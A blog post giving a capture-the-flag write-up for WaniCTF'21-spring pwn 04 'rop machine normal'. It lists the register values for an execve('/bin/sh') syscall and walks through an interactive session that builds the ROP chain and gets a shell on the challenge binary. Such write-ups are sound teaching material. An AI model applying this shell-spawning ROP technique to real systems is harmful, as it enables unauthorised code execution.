More than 3 years have passed since last update.

WaniCTF'21-spring pwn 04 rop machine normal Writeup

Last updated at 2022-03-30Posted at 2021-05-19

WaniCTF'21-spring pwn 04 rop machine normal

問題

# ./pwn04

"/bin/sh" address is 0x404070

[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop

syscall があるので execve("/bin/sh",null,null) を狙えとのこと。

syscallに飛ばすときのレジスタの状態を知っているかどうかの知識問題

レジスタ	値
RDI	"/bin/sh"のアドレス
RSI	0x0
RDX	0x0
RAX	0x3b (59 execve)

流れ

# ./pwn04

"/bin/sh" address is 0x404070

[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
> 2
"pop rdi; ret" is appended
> 1
hex value?: 404070
0x0000000000404070 is appended
> 3
"pop rsi; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 4
"pop rdx; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 5
"pop rax; ret" is appended
> 1
hex value?: 3b
0x000000000000003b is appended
> 6
"syscall; ret" is appended
> 9
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
> 0
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
# ls
peda-session-pwn02.txt	pwn02  pwn02.c	pwn02.py  pwn03  pwn03.c  pwn03.py  pwn04  pwn04.c

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up